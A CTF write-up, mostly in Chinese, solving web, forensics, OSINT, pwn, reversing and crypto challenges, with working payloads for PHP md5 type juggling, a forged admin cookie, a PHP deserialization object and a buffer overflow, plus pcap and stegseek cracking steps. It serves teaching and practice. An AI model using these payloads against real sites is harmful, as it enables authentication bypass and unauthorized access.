Web

Some type of juggling

#web#php
Can you solve this challenge?
URL:http://challenges.defsoc.tk:8080
Flag format: flag{string}

<?php
    if(isset($_GET['source'])) {
        highlight_file(__FILE__);
        die();
    } else {
        $value = "240610708";
        if (isset($_GET['hash'])) {
            if ($_GET['hash'] === $value) {
                die('It is not THAT easy!');
            } 
            $hash = md5($_GET['hash']);
            $key = md5($value);
            if($hash == $key) {
                include('flag.php');
                print "Congratulations! Your flag is: $flag";
            } else {
                print "Flag not found!";
            }
        } 
    }
?>

md5后的结果要一样，可以用0e绕过，而且hash与value之间的关系是弱等，所以hash不能是数字。var_dump(md5(‘240610708’) == md5(‘QNKCDZO’));
解题

?hash=QNKCDZO
Congratulations! Your flag is: flag{php_typ3_juggl1ng_1s_c00l}

Exclusive access

#web#owasp10
We discovered a protected page. Can you bypass it?
URL:http://challenges.defsoc.tk:9999
Flag format: flag{string}

抓包得到

Cookie: user_type=Z3Vlc3Q%3D

url解码再base64解码得到guest，将admin逆操作得到YWRtaW4%3D，传过去得到flag

flag{br0k3n_auth3nt1c4t10n}

It is Magic after all

#web#php
Can you do some magic in this page?
URL:http://challenges.defsoc.tk:3000
Flag format: flag{string}
​

<?php 
include "flag.php";  

class Magic {
    public $key;

    public function doMagic() {
        if ($this->key === true) {
          global $flag;
          echo $flag;
        }
        else {
            echo "Nothing...";
        }
    }
}

if (isset($_GET['magic'])) {  
    $magic = unserialize($_GET['magic']); 
    $magic->doMagic();
} else {
    print "Nothing...";
}  

?>

exp

<?php 

class Magic {
    public $key=true;
}

$a = new Magic();
echo serialize($a);

?>

Payload：

?magic=O:5:"Magic":1:{s:3:"key";b:1;}
#flag{php_d3s3r14l1z4t10n_3xpl01ts}

Forensics

Hiding in plain sight

#forensi#images
I think there is something fishy about this image.
Can you help me out?
Flag format: flag{string}
​

010文件尾就是flag

flag{h1dd3n_t3xt_1n_pl41ns1ght}

Welcome to the challenge

#forensics#images
Welcome to the RCTS Challenge!
Can you find the flag?
Flag format: flag{string}
​

直接foremost分离图片

flag{0n3_1m4g3_1s_n0t_3n0ugh}

About us

#forensics#pdfs
This challenge is about the RCTS CERT at FCCN.
Can you get the flag?
Flag format: flag{string}
​

strings查看：

└─$ strings RCTSCERT-FCCN.pdf |grep flag                                                                                                      139 ⨯
  <pdfx:Flag>flag{4b0ut_us_4t_rcts_c3rt}</pdfx:Flag>

Keyp it universal

#foren#pcap
We intercepted a strange communication which we believe has important information inside.
Can you retrieve the information from it?
Flag format: flag{string}
Regex: flag{[0-9a-z_]+}
​

USB键盘流量

tshark -r capture.pcap -T fields -e usb.capdata > usbdata.txt

tshark -r capture.pcap -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt

加冒号

f=open('usbdata.txt','r')
fi=open('out.txt','w')
while 1:
    a=f.readline().strip()
    if a:
        if len(a)==16: # 键盘流量len=16，鼠标流量len=8
            out=''
            for i in range(0,len(a),2):
                if i+2 != len(a):
                    out+=a[i]+a[i+1]+":"
                else:
                    out+=a[i]+a[i+1]
            fi.write(out)
            fi.write('\n')
    else:
        break

fi.close()

keyborad.py

normalKeys = {
    "04":"a", "05":"b", "06":"c", "07":"d", "08":"e",
    "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j",
     "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o",
      "13":"p", "14":"q", "15":"r", "16":"s", "17":"t",
       "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y",
        "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4",
         "22":"5", "23":"6","24":"7","25":"8","26":"9",
         "27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t",
         "2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\",
         "32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".",
         "38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>",
         "3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>",
         "44":"<F11>","45":"<F12>"}
shiftKeys = {
    "04":"A", "05":"B", "06":"C", "07":"D", "08":"E",
     "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J",
      "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O",
       "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T",
        "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y",
         "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$",
          "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")",
          "28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>",
          "2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"",
          "34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>",
          "3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>",
          "41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
output = []
keys = open('out.txt')
for line in keys:
    try:
        if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":
             continue
        if line[6:8] in normalKeys.keys():
            output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']
        else:
            output += ['[unknown]']
    except:
        pass

keys.close()

flag=0
print("".join(output))
for i in range(len(output)):
    try:
        a=output.index('<DEL>')
        del output[a]
        del output[a-1]
    except:
        pass

for i in range(len(output)):
    try:
        if output[i]=="<CAP>":
            flag+=1
            output.pop(i)
            if flag==2:
                flag=0
        if flag!=0:
            output[i]=output[i].upper()
    except:
        pass

print ('output :' + "".join(output))

得到

┌──(kali㉿kali)-[~/桌面]
└─$ python keyboard2.py capture.pcap
flagusbp4ck3tc4ptur31sfun
output :flagusbp4ck3tc4ptur31sfun

最终flag

flag{usb_p4ck3t_c4ptur3_1s_fun}

Maybe the helper can help*

You might not see it, but a flag lies within.
Flag Format: flag{string}
the-jetsons-family.jpg

参考其他人的wp：

使用 stegseek 我们得到的关键短语是 rosie
stegseek --crack the-jetsons-family.jpg --wordlist /usr/share/dict/rockyou.txt

cat the-jetsons-family.jpg.out

cat the-jetsons-family.jpg.out | base64 -d | base64 -d

OSINT

Welcome to Lisbon!

Oh, some activists defaced a Victoria Secret’s store.
Find out which was the model whose photo was damaged.
Flag format: flag{firstname_surname}

社工题

welcome_to_lisbon.jpg

从题目名字我们可以知道这家商店位于葡萄牙的里斯本，谷歌搜索 Victoria Secret Lisbon可以找到店铺位置

题目所给图片被打码的就是这个模特，搜索Victoria Secret model可以找到是这位模特

阿德瑞娜·利玛 (Adriana Lima)

flag{adriana_lima}

Mission

Something Suspicious

#mission#logging
We have detected a strange activity inside our network and manage to get some logs from it.
Can you see what happened and if there was a host compromised?
Flag format: flag{string}
ftp.log
ssh.log​

ftp.log:	ZmxhZ3tzMG0zdGgxbmc=  ->  flag{s0m3th1ng
ssh.log:	X3N1c3AxYzEwdXN9	    ->  _susp1c10us}

最终flag

flag{s0m3th1ng_susp1c10us}

PWN

Well hello there

#pwn#c
We initiated the development of a bot. So far it greets you by your name. Can you test it?
Access: nc challenges.defsoc.tk 22228
Flag format: flag{string}

拖入IDA查看main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[76]; // [rsp+0h] [rbp-58h] BYREF
  int v5; // [rsp+4Ch] [rbp-Ch]

  puts("Hello there! What is your name?");
  fflush(_bss_start);
  v5 = 0;
  gets(v4, argv);
  if ( v5 )
    system("cat flag.txt");
  else
    printf("Well, hello %s!", v4);
  putchar(10);
  return 0;
}

缓冲区溢出,name超过 76 个字符即可

└─$ ./program_local        
Hello there! What is your name?
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
flag{Waw!_Y0u_D1d!_it_^_^}


$ nc challenges.defsoc.tk 22228   
Hello there! What is your name?
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
flag{buff3r_0v3rfl0w_r0cks}

web手做出的第一个pwn题

Reverse Engineering

You are not allowed

#reverse#c
Can you reverse this program and get us the flag?
Flag format: flag{string}

这个逆向也很简单，拖入IDA找到main函数，然后F5，可以看到sub_401242函数

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char s[64]; // [rsp+0h] [rbp-50h] BYREF
  char *s1; // [rsp+40h] [rbp-10h]
  int v6; // [rsp+4Ch] [rbp-4h]

  v6 = 0;
  puts("Enter the secret key : ");
  fgets(s, 64, stdin);
  s1 = sub_401242();
  if ( !strncmp(s1, s, 0xFuLL) )
    v6 = 1;
  else
    puts("Wrong key entered! Try again? ");
  if ( v6 )
    sub_401182();
  putchar(10);
  return 0LL;
}

找到sub_401242函数，同样F5

char *sub_401242()
{
  char v1[15]; // [rsp+9h] [rbp-27h] BYREF
  char *s; // [rsp+18h] [rbp-18h]
  char *dest; // [rsp+20h] [rbp-10h]
  unsigned __int64 i; // [rsp+28h] [rbp-8h]

  qmemcpy(v1, "Sup3rS3cr3tK3y#", sizeof(v1));
  dest = (char *)malloc(4uLL);
  s = (char *)malloc(0x1FuLL);
  for ( i = 0LL; i <= 0xE; ++i )
  {
    sprintf(s, "%c", (unsigned __int8)v1[i]);
    strcat(dest, s);
  }
  return dest;
}

可以看到字符串Sup3rS3cr3tK3y#，输入即可得到flag

┌──(kali㉿kali)-[~/桌面]
└─$ ./program
Enter the secret key : 
Sup3rS3cr3tK3y#
flag{1ntr0_t0_r3v3rs3_3ng1n33r1ng}

Crypto

A simple challenge

#crypto#encoding
We have intercepted the following message and we think it has a secret flag in it.
Can you decode it?
Flag format: flag{string}
​

secret_message.txt：

Vm0weE1HRXlTWGxVYTJoVllXeGFVMWx0ZEV0alZuQlhWbXQwYVUxVk5WZFpWVlUxWVZaS2RHUkVXbFpOYWtVd1dWUkdSbVF4VG5GUmJHaHBVakpvVVZkc1pEUmpNV1JIWTBWb2JGSnJTbTlXYkZaM1RVWmtXR1JIZEZOTmEzQXdWbTF3WVZaWFNuTlhiVVpoVmpOU1RGa3llRk5XTVd3MlVtMXNhVkl5WTNsV1Z6QXhaREZrVmsxWVJsWmhhelZvVld4YWNrMUdjRmhOVlhSclVteEtNVmxyWkRSWFJrcFdZa1JPVjFKc2NGUlZWRXBUVm0xS1IySkZOVk5TUlVVMQ==

exp：

import base64
str="Vm0weE1HRXlTWGxVYTJoVllXeGFVMWx0ZEV0alZuQlhWbXQwYVUxVk5WZFpWVlUxWVZaS2RHUkVXbFpOYWtVd1dWUkdSbVF4VG5GUmJHaHBVakpvVVZkc1pEUmpNV1JIWTBWb2JGSnJTbTlXYkZaM1RVWmtXR1JIZEZOTmEzQXdWbTF3WVZaWFNuTlhiVVpoVmpOU1RGa3llRk5XTVd3MlVtMXNhVkl5WTNsV1Z6QXhaREZrVmsxWVJsWmhhelZvVld4YWNrMUdjRmhOVlhSclVteEtNVmxyWkRSWFJrcFdZa1JPVjFKc2NGUlZWRXBUVm0xS1IySkZOVk5TUlVVMQ=="
num=0  
try:
    while True :
        num=num+1
        print("第%d次解码" %(num))
        str = base64.b64decode(str.encode('utf-8'))
        str=str.decode('ascii')
        print(str)
except Exception as e:
     print("END")      

得到

This is a secret message: flag{3nc0d1ng_1s_n0t_3ncrypt10n!}

Roman encryption

#crypto#cipher
We intercepted an encrypted communication that was meant to be delivered to a threat actor named Julius.
Apparently his name is the key to decipher this message.
Can you decipher it?
Flag format: flag{string}

Csddk Rtdetp,
Qcghb ykt jko ykto ptmmkoq,
Ykt igh tps qcep bsy qk osisevs ykto oswgou: jdgl{5ta5q1qtq10h_1p_b3y}

https://quipqiup.com/令jdgl=flag

Hello Julius, Thank you for your support, You can use this key to receive your reward: flag{5um5t1tut10n_1s_k3y}

提交flag不对，继续查看题目提示，应该是带key的凯撒密码
​

解密网站：https://www.boxentriq.com/code-breaking/keyed-caesar-cipher
搜索 Julius得到全称Gaius Julius Caesar，即为key解密得到flag

Niji ce uni pieebai:
Hello Julius,
Thank you for your support,
You can use this key to receive your reward: flag{5ub5t1tut10n_1s_k3y}

Hextraordinary security

#crypto#encoding
We just found this garbage file.
Can you decode it and retrieve any useful information from it?
Flag format: flag{string}
​

hex转str

flag{h3x4d3c1m4l_4s_4n_0bfusc4t10n_t00l}